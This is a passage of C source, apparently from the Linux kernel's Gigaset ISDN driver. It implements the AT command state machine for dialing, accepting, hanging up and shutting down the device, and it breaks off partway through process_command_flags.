	/* include the CID only if it is a valid Siemens CID (1..65535);
	 * wrap in DLE framing when DLE mode is active */
	if (cid > 0 && cid <= 65535)
		cb->len = snprintf(cb->buf, size,
				   cs->dle ? "\020(AT%d%s\020)" : "AT%d%s",
				   cid, cmd);
	else
		cb->len = snprintf(cb->buf, size,
				   cs->dle ? "\020(AT%s\020)" : "AT%s",
				   cmd);
	cb->offset = 0;
	cb->next = NULL;
	cb->wake_tasklet = NULL;
	cs->ops->write_cmd(cs, cb);
}
static struct at_state_t *at_state_from_cid(struct cardstate *cs, int cid)
{
struct at_state_t *at_state;
int i;
unsigned long flags;
if (cid == 0)
return &cs->at_state;
for (i = 0; i < cs->channels; ++i)
if (cid == cs->bcs[i].at_state.cid)
return &cs->bcs[i].at_state;
spin_lock_irqsave(&cs->lock, flags);
list_for_each_entry(at_state, &cs->temp_at_states, list)
if (cid == at_state->cid) {
spin_unlock_irqrestore(&cs->lock, flags);
return at_state;
}
spin_unlock_irqrestore(&cs->lock, flags);
return NULL;
}
/* tear down a B channel: notify the LL of B and D channel hangup as
 * needed, release the channel reservation and reset its state */
static void bchannel_down(struct bc_state *bcs)
{
	if (bcs->chstate & CHS_B_UP) {
		bcs->chstate &= ~CHS_B_UP;
		gigaset_isdn_hupB(bcs);
	}

	if (bcs->chstate & (CHS_D_UP | CHS_NOTIFY_LL)) {
		bcs->chstate &= ~(CHS_D_UP | CHS_NOTIFY_LL);
		gigaset_isdn_hupD(bcs);
	}

	gigaset_free_channel(bcs);

	gigaset_bcs_reinit(bcs);
}
/* mark a B channel as up and notify the LL of the connection;
 * a repeated call for an already-up channel only logs a notice */
static void bchannel_up(struct bc_state *bcs)
{
	if (bcs->chstate & CHS_B_UP) {
		dev_notice(bcs->cs->dev, "%s: B channel already up\n",
			   __func__);
		return;
	}

	bcs->chstate |= CHS_B_UP;
	gigaset_isdn_connB(bcs);
}
/* begin an outgoing call:
 * take ownership of the prepared AT command strings (passed via data) and
 * schedule PC_CID to request a call ID; if the AT state's sequence index
 * no longer matches (sequence aborted meanwhile), free the commands and
 * schedule PC_NOCID instead */
static void start_dial(struct at_state_t *at_state, void *data,
		       unsigned seq_index)
{
	struct bc_state *bcs = at_state->bcs;
	struct cardstate *cs = at_state->cs;
	char **commands = data;		/* array of AT_NUM command strings */
	unsigned long flags;
	int i;

	bcs->chstate |= CHS_NOTIFY_LL;

	spin_lock_irqsave(&cs->lock, flags);
	if (at_state->seq_index != seq_index) {
		spin_unlock_irqrestore(&cs->lock, flags);
		goto error;
	}
	spin_unlock_irqrestore(&cs->lock, flags);

	/* transfer ownership of the command strings to the B channel */
	for (i = 0; i < AT_NUM; ++i) {
		kfree(bcs->commands[i]);
		bcs->commands[i] = commands[i];
	}

	at_state->pending_commands |= PC_CID;
	gig_dbg(DEBUG_EVENT, "Scheduling PC_CID");
	cs->commands_pending = 1;
	return;

error:
	/* sequence was aborted: drop the command strings instead */
	for (i = 0; i < AT_NUM; ++i) {
		kfree(commands[i]);
		commands[i] = NULL;
	}
	at_state->pending_commands |= PC_NOCID;
	gig_dbg(DEBUG_EVENT, "Scheduling PC_NOCID");
	cs->commands_pending = 1;
	return;
}
/* accept an incoming call:
 * prepare the protocol and channel selection AT commands and schedule
 * PC_ACCEPT; on allocation failure, schedule PC_HUP instead */
static void start_accept(struct at_state_t *at_state)
{
	struct cardstate *cs = at_state->cs;
	struct bc_state *bcs = at_state->bcs;
	int i;

	/* drop any leftover command strings from a previous call */
	for (i = 0; i < AT_NUM; ++i) {
		kfree(bcs->commands[i]);
		bcs->commands[i] = NULL;
	}

	bcs->commands[AT_PROTO] = kmalloc(9, GFP_ATOMIC);
	bcs->commands[AT_ISO] = kmalloc(9, GFP_ATOMIC);
	if (bcs->commands[AT_PROTO] && bcs->commands[AT_ISO]) {
		snprintf(bcs->commands[AT_PROTO], 9, "^SBPR=%u\r",
			 bcs->proto2);
		snprintf(bcs->commands[AT_ISO], 9, "^SISO=%u\r",
			 bcs->channel + 1);
		at_state->pending_commands |= PC_ACCEPT;
		gig_dbg(DEBUG_EVENT, "Scheduling PC_ACCEPT");
	} else {
		dev_err(at_state->cs->dev, "out of memory\n");
		/* error reset: hang up instead of accepting */
		at_state->pending_commands |= PC_HUP;
		gig_dbg(DEBUG_EVENT, "Scheduling PC_HUP");
	}
	cs->commands_pending = 1;
}
/* start up the device:
 * release B channels, schedule initialization (unless locked), bring up
 * the ISDN interface and wake any waiter */
static void do_start(struct cardstate *cs)
{
	gigaset_free_channels(cs);

	if (cs->mstate != MS_LOCKED)
		schedule_init(cs, MS_INIT);

	cs->isdn_up = 1;
	gigaset_isdn_start(cs);

	cs->waiting = 0;
	wake_up(&cs->waitqueue);
}
/* complete a device shutdown:
 * reset mode state (unless locked), take the ISDN interface down and
 * wake any waiter with -ENODEV */
static void finish_shutdown(struct cardstate *cs)
{
	if (cs->mstate != MS_LOCKED) {
		cs->mstate = MS_UNINITIALIZED;
		cs->mode = M_UNKNOWN;
	}

	/* Tell the LL that the device is not available .. */
	if (cs->isdn_up) {
		cs->isdn_up = 0;
		gigaset_isdn_stop(cs);
	}

	/* The rest is done by cleanup_cs() in process context. */

	cs->cmd_result = -ENODEV;
	cs->waiting = 0;
	wake_up(&cs->waitqueue);
}
/* initiate a device shutdown:
 * block B channel reservation; if the device is in the READY state,
 * schedule the PC_SHUTDOWN command sequence, otherwise finish
 * immediately */
static void do_shutdown(struct cardstate *cs)
{
	gigaset_block_channels(cs);

	if (cs->mstate != MS_READY) {
		finish_shutdown(cs);
		return;
	}

	cs->mstate = MS_SHUTDOWN;
	cs->at_state.pending_commands |= PC_SHUTDOWN;
	gig_dbg(DEBUG_EVENT, "Scheduling PC_SHUTDOWN");
	cs->commands_pending = 1;
}
/* stop the device: mark it disconnected under the card lock, then
 * initiate shutdown */
static void do_stop(struct cardstate *cs)
{
	unsigned long flags;

	spin_lock_irqsave(&cs->lock, flags);
	cs->connected = 0;
	spin_unlock_irqrestore(&cs->lock, flags);

	do_shutdown(cs);
}
/* Entering cid mode or getting a cid failed:
 * try to initialize the device and try again.
 *
 * channel >= 0: getting cid for the channel failed
 * channel < 0: entering cid mode failed
 *
 * returns 0 on success, <0 on failure
 */
static int reinit_and_retry(struct cardstate *cs, int channel)
{
	int ch;

	/* give up once the retry budget is exhausted */
	if (--cs->retry_count <= 0)
		return -EFAULT;

	/* never reinitialize while any connection is active */
	for (ch = 0; ch < cs->channels; ++ch)
		if (cs->bcs[ch].at_state.cid > 0)
			return -EBUSY;

	if (channel >= 0) {
		dev_warn(cs->dev,
			 "Could not get a call id. Reinit device and try again.\n");
		/* re-request the CID for this channel after the reinit */
		cs->bcs[channel].at_state.pending_commands |= PC_CID;
	} else {
		dev_warn(cs->dev,
			 "Could not enter cid mode. Reinit device and try again.\n");
	}

	schedule_init(cs, MS_INIT);
	return 0;
}
static int at_state_invalid(struct cardstate *cs,
struct at_state_t *test_ptr)
{
unsigned long flags;
unsigned channel;
struct at_state_t *at_state;
int retval = 0;
spin_lock_irqsave(&cs->lock, flags);
if (test_ptr == &cs->at_state)
goto exit;
list_for_each_entry(at_state, &cs->temp_at_states, list)
if (at_state == test_ptr)
goto exit;
for (channel = 0; channel < cs->channels; ++channel)
if (&cs->bcs[channel].at_state == test_ptr)
goto exit;
retval = 1;
exit:
spin_unlock_irqrestore(&cs->lock, flags);
return retval;
}
/* handle an incoming call:
 * present it to the LL and act on the disposition; anything other than
 * an explicit ACCEPT results in an active hangup (the device does not
 * actually reject on its own, see comment below) */
static void handle_icall(struct cardstate *cs, struct bc_state *bcs,
			 struct at_state_t *at_state)
{
	int retval;

	retval = gigaset_isdn_icall(at_state);
	switch (retval) {
	case ICALL_ACCEPT:
		break;
	default:
		dev_err(cs->dev, "internal error: disposition=%d\n", retval);
		/* --v-- fall through --v-- */
	case ICALL_IGNORE:
	case ICALL_REJECT:
		/* hang up actively
		 * Device doc says that would reject the call.
		 * In fact it doesn't.
		 */
		at_state->pending_commands |= PC_HUP;
		cs->commands_pending = 1;
		break;
	}
}
/* lock the device for direct userspace access:
 * only possible when uninitialized/ready with nothing in flight, or when
 * already locked; returns the previous operating mode, or -EBUSY */
static int do_lock(struct cardstate *cs)
{
	int prev_mode;
	int ch;

	switch (cs->mstate) {
	case MS_UNINITIALIZED:
	case MS_READY:
		/* refuse while any command activity is pending */
		if (cs->cur_at_seq || !list_empty(&cs->temp_at_states) ||
		    cs->at_state.pending_commands)
			return -EBUSY;

		for (ch = 0; ch < cs->channels; ++ch)
			if (cs->bcs[ch].at_state.pending_commands)
				return -EBUSY;

		/* reserve all B channels for the duration of the lock */
		if (gigaset_get_channels(cs) < 0)
			return -EBUSY;

		break;
	case MS_LOCKED:
		break;
	default:
		return -EBUSY;
	}

	prev_mode = cs->mode;
	cs->mstate = MS_LOCKED;
	cs->mode = M_UNKNOWN;

	return prev_mode;
}
/* release the userspace access lock:
 * reset mode state, release the B channels and (if still connected)
 * schedule reinitialization; -EINVAL if not locked */
static int do_unlock(struct cardstate *cs)
{
	if (cs->mstate != MS_LOCKED)
		return -EINVAL;

	cs->mstate = MS_UNINITIALIZED;
	cs->mode = M_UNKNOWN;
	gigaset_free_channels(cs);
	if (cs->connected)
		schedule_init(cs, MS_INIT);

	return 0;
}
/* execute one ACT_XXX action for the state machine.
 * @action:      ACT_XXX code (or ACT_CMD + AT_XXX for a prepared command)
 * @cs:          card state
 * @bcs:         B channel state of the event's AT state (may be NULL)
 * @p_at_state:  in/out: AT state; may be replaced/cleared by disconnect()
 * @pp_command:  out: AT command string to send, if any
 * @p_genresp:   out: set to 1 to generate an artificial response
 * @p_resp_code: out: response code for the artificial response
 * @ev:          the event being processed
 */
static void do_action(int action, struct cardstate *cs,
		      struct bc_state *bcs,
		      struct at_state_t **p_at_state, char **pp_command,
		      int *p_genresp, int *p_resp_code,
		      struct event_t *ev)
{
	struct at_state_t *at_state = *p_at_state;
	struct at_state_t *at_state2;
	unsigned long flags;

	int channel;

	unsigned char *s, *e;
	int i;
	unsigned long val;

	switch (action) {
	case ACT_NOTHING:
		break;
	case ACT_TIMEOUT:
		at_state->waiting = 1;
		break;
	case ACT_INIT:
		cs->at_state.pending_commands &= ~PC_INIT;
		cs->cur_at_seq = SEQ_NONE;
		cs->mode = M_UNIMODEM;
		spin_lock_irqsave(&cs->lock, flags);
		if (!cs->cidmode) {
			spin_unlock_irqrestore(&cs->lock, flags);
			gigaset_free_channels(cs);
			cs->mstate = MS_READY;
			break;
		}
		spin_unlock_irqrestore(&cs->lock, flags);
		/* CID mode requested: schedule the mode switch */
		cs->at_state.pending_commands |= PC_CIDMODE;
		gig_dbg(DEBUG_EVENT, "Scheduling PC_CIDMODE");
		cs->commands_pending = 1;
		break;
	case ACT_FAILINIT:
		dev_warn(cs->dev, "Could not initialize the device.\n");
		cs->dle = 0;
		init_failed(cs, M_UNKNOWN);
		cs->cur_at_seq = SEQ_NONE;
		break;
	case ACT_CONFIGMODE:
		init_failed(cs, M_CONFIG);
		cs->cur_at_seq = SEQ_NONE;
		break;
	case ACT_SETDLE1:
		cs->dle = 1;
		/* cs->inbuf[0].inputstate |= INS_command | INS_DLE_command; */
		cs->inbuf[0].inputstate &=
			~(INS_command | INS_DLE_command);
		break;
	case ACT_SETDLE0:
		cs->dle = 0;
		cs->inbuf[0].inputstate =
			(cs->inbuf[0].inputstate & ~INS_DLE_command)
			| INS_command;
		break;
	case ACT_CMODESET:
		if (cs->mstate == MS_INIT || cs->mstate == MS_RECOVER) {
			gigaset_free_channels(cs);
			cs->mstate = MS_READY;
		}
		cs->mode = M_CID;
		cs->cur_at_seq = SEQ_NONE;
		break;
	case ACT_UMODESET:
		cs->mode = M_UNIMODEM;
		cs->cur_at_seq = SEQ_NONE;
		break;
	case ACT_FAILCMODE:
		cs->cur_at_seq = SEQ_NONE;
		if (cs->mstate == MS_INIT || cs->mstate == MS_RECOVER) {
			init_failed(cs, M_UNKNOWN);
			break;
		}
		if (reinit_and_retry(cs, -1) < 0)
			schedule_init(cs, MS_RECOVER);
		break;
	case ACT_FAILUMODE:
		cs->cur_at_seq = SEQ_NONE;
		schedule_init(cs, MS_RECOVER);
		break;
	case ACT_HUPMODEM:
		/* send "+++" (hangup in unimodem mode) */
		if (cs->connected) {
			struct cmdbuf_t *cb;

			cb = kmalloc(sizeof(struct cmdbuf_t) + 3, GFP_ATOMIC);
			if (!cb) {
				dev_err(cs->dev, "%s: out of memory\n",
					__func__);
				return;
			}
			memcpy(cb->buf, "+++", 3);
			cb->len = 3;
			cb->offset = 0;
			cb->next = NULL;
			cb->wake_tasklet = NULL;
			cs->ops->write_cmd(cs, cb);
		}
		break;
	case ACT_RING:
		/* get fresh AT state structure for new CID */
		at_state2 = get_free_channel(cs, ev->parameter);
		if (!at_state2) {
			dev_warn(cs->dev,
				 "RING ignored: could not allocate channel structure\n");
			break;
		}

		/* initialize AT state structure
		 * note that bcs may be NULL if no B channel is free
		 */
		at_state2->ConState = 700;
		for (i = 0; i < STR_NUM; ++i) {
			kfree(at_state2->str_var[i]);
			at_state2->str_var[i] = NULL;
		}
		at_state2->int_var[VAR_ZCTP] = -1;

		/* start the ring timeout under the card lock */
		spin_lock_irqsave(&cs->lock, flags);
		at_state2->timer_expires = RING_TIMEOUT;
		at_state2->timer_active = 1;
		spin_unlock_irqrestore(&cs->lock, flags);
		break;
	case ACT_ICALL:
		handle_icall(cs, bcs, at_state);
		break;
	case ACT_FAILSDOWN:
		dev_warn(cs->dev, "Could not shut down the device.\n");
		/* fall through */
	case ACT_FAKESDOWN:
	case ACT_SDOWN:
		cs->cur_at_seq = SEQ_NONE;
		finish_shutdown(cs);
		break;
	case ACT_CONNECT:
		if (cs->onechannel) {
			/* single-channel device: enter DLE mode first */
			at_state->pending_commands |= PC_DLE1;
			cs->commands_pending = 1;
			break;
		}
		bcs->chstate |= CHS_D_UP;
		gigaset_isdn_connD(bcs);
		cs->ops->init_bchannel(bcs);
		break;
	case ACT_DLE1:
		cs->cur_at_seq = SEQ_NONE;
		bcs = cs->bcs + cs->curchannel;

		bcs->chstate |= CHS_D_UP;
		gigaset_isdn_connD(bcs);
		cs->ops->init_bchannel(bcs);
		break;
	case ACT_FAKEHUP:
		at_state->int_var[VAR_ZSAU] = ZSAU_NULL;
		/* fall through */
	case ACT_DISCONNECT:
		cs->cur_at_seq = SEQ_NONE;
		at_state->cid = -1;
		if (bcs && cs->onechannel && cs->dle) {
			/* Check for other open channels not needed:
			 * DLE only used for M10x with one B channel.
			 */
			at_state->pending_commands |= PC_DLE0;
			cs->commands_pending = 1;
		} else
			disconnect(p_at_state);
		break;
	case ACT_FAKEDLE0:
		at_state->int_var[VAR_ZDLE] = 0;
		cs->dle = 0;
		/* fall through */
	case ACT_DLE0:
		cs->cur_at_seq = SEQ_NONE;
		at_state2 = &cs->bcs[cs->curchannel].at_state;
		disconnect(&at_state2);
		break;
	case ACT_ABORTHUP:
		cs->cur_at_seq = SEQ_NONE;
		dev_warn(cs->dev, "Could not hang up.\n");
		at_state->cid = -1;
		if (bcs && cs->onechannel)
			at_state->pending_commands |= PC_DLE0;
		else
			disconnect(p_at_state);
		schedule_init(cs, MS_RECOVER);
		break;
	case ACT_FAILDLE0:
		cs->cur_at_seq = SEQ_NONE;
		dev_warn(cs->dev, "Could not leave DLE mode.\n");
		at_state2 = &cs->bcs[cs->curchannel].at_state;
		disconnect(&at_state2);
		schedule_init(cs, MS_RECOVER);
		break;
	case ACT_FAILDLE1:
		cs->cur_at_seq = SEQ_NONE;
		dev_warn(cs->dev,
			 "Could not enter DLE mode. Trying to hang up.\n");
		channel = cs->curchannel;
		cs->bcs[channel].at_state.pending_commands |= PC_HUP;
		cs->commands_pending = 1;
		break;

	case ACT_CID: /* got cid; start dialing */
		cs->cur_at_seq = SEQ_NONE;
		channel = cs->curchannel;
		if (ev->parameter > 0 && ev->parameter <= 65535) {
			cs->bcs[channel].at_state.cid = ev->parameter;
			cs->bcs[channel].at_state.pending_commands |=
				PC_DIAL;
			cs->commands_pending = 1;
			break;
		}
		/* bad cid: fall through */
	case ACT_FAILCID:
		cs->cur_at_seq = SEQ_NONE;
		channel = cs->curchannel;
		if (reinit_and_retry(cs, channel) < 0) {
			dev_warn(cs->dev,
				 "Could not get a call ID. Cannot dial.\n");
			at_state2 = &cs->bcs[channel].at_state;
			disconnect(&at_state2);
		}
		break;
	case ACT_ABORTCID:
		cs->cur_at_seq = SEQ_NONE;
		at_state2 = &cs->bcs[cs->curchannel].at_state;
		disconnect(&at_state2);
		break;

	case ACT_DIALING:
	case ACT_ACCEPTED:
		cs->cur_at_seq = SEQ_NONE;
		break;

	case ACT_ABORTACCEPT:	/* hangup/error/timeout during ICALL procssng */
		disconnect(p_at_state);
		break;

	case ACT_ABORTDIAL:	/* error/timeout during dial preparation */
		cs->cur_at_seq = SEQ_NONE;
		at_state->pending_commands |= PC_HUP;
		cs->commands_pending = 1;
		break;

	case ACT_REMOTEREJECT:	/* DISCONNECT_IND after dialling */
	case ACT_CONNTIMEOUT:	/* timeout waiting for ZSAU=ACTIVE */
	case ACT_REMOTEHUP:	/* DISCONNECT_IND with established connection */
		at_state->pending_commands |= PC_HUP;
		cs->commands_pending = 1;
		break;
	case ACT_GETSTRING: /* warning: RING, ZDLE, ...
			       are not handled properly anymore */
		at_state->getstring = 1;
		break;
	case ACT_SETVER:
		if (!ev->ptr) {
			*p_genresp = 1;
			*p_resp_code = RSP_ERROR;
			break;
		}
		s = ev->ptr;

		if (!strcmp(s, "OK")) {
			/* OK without version string: assume old response */
			*p_genresp = 1;
			*p_resp_code = RSP_NONE;
			break;
		}

		/* parse "a.b.c.d" firmware version string */
		for (i = 0; i < 4; ++i) {
			val = simple_strtoul(s, (char **) &e, 10);
			if (val > INT_MAX || e == s)
				break;
			if (i == 3) {
				if (*e)
					break;
			} else if (*e != '.')
				break;
			else
				s = e + 1;
			cs->fwver[i] = val;
		}
		if (i != 4) {
			*p_genresp = 1;
			*p_resp_code = RSP_ERROR;
			break;
		}
		/* version parsed; ACT_GOTVER will confirm it on RSP_OK */
		cs->gotfwver = 0;
		break;
	case ACT_GOTVER:
		if (cs->gotfwver == 0) {
			cs->gotfwver = 1;
			gig_dbg(DEBUG_EVENT,
				"firmware version %02d.%03d.%02d.%02d",
				cs->fwver[0], cs->fwver[1],
				cs->fwver[2], cs->fwver[3]);
			break;
		}
		/* fall through */
	case ACT_FAILVER:
		cs->gotfwver = -1;
		dev_err(cs->dev, "could not read firmware version.\n");
		break;
	case ACT_ERROR:
		gig_dbg(DEBUG_ANY, "%s: ERROR response in ConState %d",
			__func__, at_state->ConState);
		cs->cur_at_seq = SEQ_NONE;
		break;
	case ACT_DEBUG:
		gig_dbg(DEBUG_ANY, "%s: resp_code %d in ConState %d",
			__func__, ev->type, at_state->ConState);
		break;
	case ACT_WARN:
		dev_warn(cs->dev, "%s: resp_code %d in ConState %d!\n",
			 __func__, ev->type, at_state->ConState);
		break;
	case ACT_ZCAU:
		dev_warn(cs->dev, "cause code %04x in connection state %d.\n",
			 ev->parameter, at_state->ConState);
		break;

	/* events from the LL */
	case ACT_DIAL:
		start_dial(at_state, ev->ptr, ev->parameter);
		break;
	case ACT_ACCEPT:
		start_accept(at_state);
		break;
	case ACT_HUP:
		at_state->pending_commands |= PC_HUP;
		gig_dbg(DEBUG_EVENT, "Scheduling PC_HUP");
		cs->commands_pending = 1;
		break;

	/* hotplug events */
	case ACT_STOP:
		do_stop(cs);
		break;
	case ACT_START:
		do_start(cs);
		break;

	/* events from the interface */
	case ACT_IF_LOCK:
		cs->cmd_result = ev->parameter ? do_lock(cs) : do_unlock(cs);
		cs->waiting = 0;
		wake_up(&cs->waitqueue);
		break;
	case ACT_IF_VER:
		if (ev->parameter != 0)
			cs->cmd_result = -EINVAL;
		else if (cs->gotfwver != 1) {
			cs->cmd_result = -ENOENT;
		} else {
			memcpy(ev->arg, cs->fwver, sizeof cs->fwver);
			cs->cmd_result = 0;
		}
		cs->waiting = 0;
		wake_up(&cs->waitqueue);
		break;

	/* events from the proc file system */
	case ACT_PROC_CIDMODE:
		spin_lock_irqsave(&cs->lock, flags);
		if (ev->parameter != cs->cidmode) {
			cs->cidmode = ev->parameter;
			if (ev->parameter) {
				cs->at_state.pending_commands |= PC_CIDMODE;
				gig_dbg(DEBUG_EVENT, "Scheduling PC_CIDMODE");
			} else {
				cs->at_state.pending_commands |= PC_UMMODE;
				gig_dbg(DEBUG_EVENT, "Scheduling PC_UMMODE");
			}
			cs->commands_pending = 1;
		}
		spin_unlock_irqrestore(&cs->lock, flags);
		cs->waiting = 0;
		wake_up(&cs->waitqueue);
		break;

	/* events from the hardware drivers */
	case ACT_NOTIFY_BC_DOWN:
		bchannel_down(bcs);
		break;
	case ACT_NOTIFY_BC_UP:
		bchannel_up(bcs);
		break;
	case ACT_SHUTDOWN:
		do_shutdown(cs);
		break;

	default:
		/* ACT_CMD + AT_XXX: hand back the prepared command string */
		if (action >= ACT_CMD && action < ACT_CMD + AT_NUM) {
			*pp_command = at_state->bcs->commands[action - ACT_CMD];
			if (!*pp_command) {
				*p_genresp = 1;
				*p_resp_code = RSP_NULL;
			}
		} else
			dev_err(cs->dev, "%s: action==%d!\n", __func__, action);
	}
}
/* State machine to do the calling and hangup procedure
 * Looks up the reply table row matching the incoming event and the
 * current connection state, executes the row's actions, and advances
 * the connection state / timers accordingly. */
static void process_event(struct cardstate *cs, struct event_t *ev)
{
	struct bc_state *bcs;
	char *p_command = NULL;
	struct reply_t *rep;
	int rcode;
	int genresp = 0;
	int resp_code = RSP_ERROR;
	struct at_state_t *at_state;
	int index;
	int curact;
	unsigned long flags;

	/* resolve the at_state the event refers to: by call ID if one is
	 * set, otherwise via the pointer carried in the event itself */
	if (ev->cid >= 0) {
		at_state = at_state_from_cid(cs, ev->cid);
		if (!at_state) {
			gig_dbg(DEBUG_EVENT, "event %d for invalid cid %d",
				ev->type, ev->cid);
			gigaset_add_event(cs, &cs->at_state, RSP_WRONG_CID,
					  NULL, 0, NULL);
			return;
		}
	} else {
		at_state = ev->at_state;
		if (at_state_invalid(cs, at_state)) {
			gig_dbg(DEBUG_EVENT, "event for invalid at_state %p",
				at_state);
			return;
		}
	}
	gig_dbg(DEBUG_EVENT, "connection state %d, event %d",
		at_state->ConState, ev->type);
	bcs = at_state->bcs;

	/* Setting the pointer to the dial array */
	rep = at_state->replystruct;

	/* a timeout event is only valid if it carries the current timer
	 * index and the timer is still active (cs->lock guards these) */
	spin_lock_irqsave(&cs->lock, flags);
	if (ev->type == EV_TIMEOUT) {
		if (ev->parameter != at_state->timer_index
		    || !at_state->timer_active) {
			ev->type = RSP_NONE; /* old timeout */
			gig_dbg(DEBUG_EVENT, "old timeout");
		} else {
			if (at_state->waiting)
				gig_dbg(DEBUG_EVENT, "stopped waiting");
			else
				gig_dbg(DEBUG_EVENT, "timeout occurred");
		}
	}
	spin_unlock_irqrestore(&cs->lock, flags);

	/* if the response belongs to a variable in at_state->int_var[VAR_XXXX]
	   or at_state->str_var[STR_XXXX], set it */
	if (ev->type >= RSP_VAR && ev->type < RSP_VAR + VAR_NUM) {
		index = ev->type - RSP_VAR;
		at_state->int_var[index] = ev->parameter;
	} else if (ev->type >= RSP_STR && ev->type < RSP_STR + STR_NUM) {
		index = ev->type - RSP_STR;
		/* take ownership of the event's string payload */
		kfree(at_state->str_var[index]);
		at_state->str_var[index] = ev->ptr;
		ev->ptr = NULL; /* prevent process_events() from
				   deallocating ptr */
	}
	if (ev->type == EV_TIMEOUT || ev->type == RSP_STRING)
		at_state->getstring = 0;

	/* Search row in dial array which matches modem response and current
	   constate */
	for (;; rep++) {
		rcode = rep->resp_code;
		if (rcode == RSP_LAST) {
			/* found nothing...*/
			dev_warn(cs->dev, "%s: rcode=RSP_LAST: "
				 "resp_code %d in ConState %d!\n",
				 __func__, ev->type, at_state->ConState);
			return;
		}
		if ((rcode == RSP_ANY || rcode == ev->type)
		    && ((int) at_state->ConState >= rep->min_ConState)
		    && (rep->max_ConState < 0
			|| (int) at_state->ConState <= rep->max_ConState)
		    && (rep->parameter < 0 || rep->parameter == ev->parameter))
			break;
	}
	p_command = rep->command;
	at_state->waiting = 0;
	/* execute every action of the matched row; do_action() clears
	 * at_state on disconnect, so re-check it each iteration */
	for (curact = 0; curact < MAXACT; ++curact) {
		/* The row tells us what we should do ..
		 */
		do_action(rep->action[curact], cs, bcs, &at_state, &p_command,
			  &genresp, &resp_code, ev);
		if (!at_state)
			/* at_state destroyed by disconnect */
			return;
	}

	/* Jump to the next con-state regarding the array */
	if (rep->new_ConState >= 0)
		at_state->ConState = rep->new_ConState;

	if (genresp) {
		/* a generated response supersedes command sending and
		 * cancels the response timer */
		spin_lock_irqsave(&cs->lock, flags);
		at_state->timer_expires = 0;
		at_state->timer_active = 0;
		spin_unlock_irqrestore(&cs->lock, flags);
		gigaset_add_event(cs, at_state, resp_code, NULL, 0, NULL);
	} else {
		/* Send command to modem if not NULL... */
		if (p_command) {
			if (cs->connected)
				send_command(cs, p_command, at_state);
			else
				gigaset_add_event(cs, at_state, RSP_NODEV,
						  NULL, 0, NULL);
		}
		spin_lock_irqsave(&cs->lock, flags);
		if (!rep->timeout) {
			at_state->timer_expires = 0;
			at_state->timer_active = 0;
		} else if (rep->timeout > 0) { /* new timeout */
			/* timeout field is in seconds; timer ticks are
			 * presumably 1/10 s - hence the * 10 */
			at_state->timer_expires = rep->timeout * 10;
			at_state->timer_active = 1;
			++at_state->timer_index;
		}
		spin_unlock_irqrestore(&cs->lock, flags);
	}
}
/* Start an AT command sequence: mark the card busy with @sequence and
 * queue the initial RSP_INIT event that drives it.
 * NOTE(review): cur_at_seq is assigned before the event is queued -
 * presumably so the event processing sees the card as busy; keep the
 * statement order. */
static void schedule_sequence(struct cardstate *cs,
			      struct at_state_t *at_state, int sequence)
{
	cs->cur_at_seq = sequence;
	gigaset_add_event(cs, at_state, RSP_INIT, NULL, sequence, NULL);
}
/* Pick the next pending AT command and schedule its sequence.
 * Scans the pending_commands bits of the card and of every B channel
 * in fixed priority order (shutdown/reset cleanup, unimodem switch,
 * hangups, INIT, SHUTDOWN, CIDMODE, then DLE1/ACCEPT/DIAL/CID) and
 * schedules at most one sequence per call. */
static void process_command_flags(struct cardstate *cs)
{
	struct at_state_t *at_state = NULL;
	struct bc_state *bcs;
	int i;
	int sequence;
	unsigned long flags;

	cs->commands_pending = 0;

	/* only one AT command sequence may be in flight at a time */
	if (cs->cur_at_seq) {
		gig_dbg(DEBUG_EVENT, "not searching scheduled commands: busy");
		return;
	}

	gig_dbg(DEBUG_EVENT, "searching scheduled commands");

	sequence = SEQ_NONE;

	/* clear pending_commands and hangup channels on shutdown */
	if (cs->at_state.pending_commands & PC_SHUTDOWN) {
		cs->at_state.pending_commands &= ~PC_CIDMODE;
		for (i = 0; i < cs->channels; ++i) {
			bcs = cs->bcs + i;
			at_state = &bcs->at_state;
			at_state->pending_commands &=
				~(PC_DLE1 | PC_ACCEPT | PC_DIAL);
			if (at_state->cid > 0)
				at_state->pending_commands |= PC_HUP;
			if (at_state->pending_commands & PC_CID) {
				at_state->pending_commands |= PC_NOCID;
				at_state->pending_commands &= ~PC_CID;
			}
		}
	}

	/* clear pending_commands and hangup channels on reset */
	if (cs->at_state.pending_commands & PC_INIT) {
		cs->at_state.pending_commands &= ~PC_CIDMODE;
		for (i = 0; i < cs->channels; ++i) {
			bcs = cs->bcs + i;
			at_state = &bcs->at_state;
			at_state->pending_commands &=
				~(PC_DLE1 | PC_ACCEPT | PC_DIAL);
			if (at_state->cid > 0)
				at_state->pending_commands |= PC_HUP;
			if (cs->mstate == MS_RECOVER) {
				if (at_state->pending_commands & PC_CID) {
					at_state->pending_commands |= PC_NOCID;
					at_state->pending_commands &= ~PC_CID;
				}
			}
		}
	}

	/* only switch back to unimodem mode if no commands are pending and
	 * no channels are up */
	spin_lock_irqsave(&cs->lock, flags);
	if (cs->at_state.pending_commands == PC_UMMODE
	    && !cs->cidmode
	    && list_empty(&cs->temp_at_states)
	    && cs->mode == M_CID) {
		sequence = SEQ_UMMODE;
		at_state = &cs->at_state;
		for (i = 0; i < cs->channels; ++i) {
			bcs = cs->bcs + i;
			if (bcs->at_state.pending_commands ||
			    bcs->at_state.cid > 0) {
				sequence = SEQ_NONE;
				break;
			}
		}
	}
	spin_unlock_irqrestore(&cs->lock, flags);
	cs->at_state.pending_commands &= ~PC_UMMODE;
	if (sequence != SEQ_NONE) {
		schedule_sequence(cs, at_state, sequence);
		return;
	}

	/* hangups first, channel by channel */
	for (i = 0; i < cs->channels; ++i) {
		bcs = cs->bcs + i;
		if (bcs->at_state.pending_commands & PC_HUP) {
			if (cs->dle) {
				/* leave DLE mode before hanging up */
				cs->curchannel = bcs->channel;
				schedule_sequence(cs, &cs->at_state, SEQ_DLE0);
				return;
			}
			bcs->at_state.pending_commands &= ~PC_HUP;
			if (bcs->at_state.pending_commands & PC_CID) {
				/* not yet dialing: PC_NOCID is sufficient */
				bcs->at_state.pending_commands |= PC_NOCID;
				bcs->at_state.pending_commands &= ~PC_CID;
			} else {
				schedule_sequence(cs, &bcs->at_state, SEQ_HUP);
				return;
			}
		}
		if (bcs->at_state.pending_commands & PC_NOCID) {
			bcs->at_state.pending_commands &= ~PC_NOCID;
			cs->curchannel = bcs->channel;
			schedule_sequence(cs, &cs->at_state, SEQ_NOCID);
			return;
		} else if (bcs->at_state.pending_commands & PC_DLE0) {
			bcs->at_state.pending_commands &= ~PC_DLE0;
			cs->curchannel = bcs->channel;
			schedule_sequence(cs, &cs->at_state, SEQ_DLE0);
			return;
		}
	}

	/* hangups pending on temporary AT states */
